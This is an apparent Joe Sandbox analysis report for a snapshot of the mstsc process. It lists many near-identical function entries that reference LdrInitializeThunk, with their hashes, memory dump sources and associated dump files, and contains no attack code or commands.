Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 025C07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025C07B7

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 025BFA50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFA5B

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 025BFAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFADB

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 025BFAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFAF3

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 025BFAB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFAC3

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 025BFB50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFB5B

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 025BFB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFB73

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 025BFBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFBC3

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 025BF900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BF90E

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 025BF9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BF9FB

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 025BFED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFEDB

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 025BFEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFEAB

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 025BFFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFFBF

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 025BFC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFC6B

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 025BFC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFC9B

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 025BFDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFDCB

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 025BFD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025BFD9A

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 000D9030 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000007D0), ref: 000D90D8

Strings

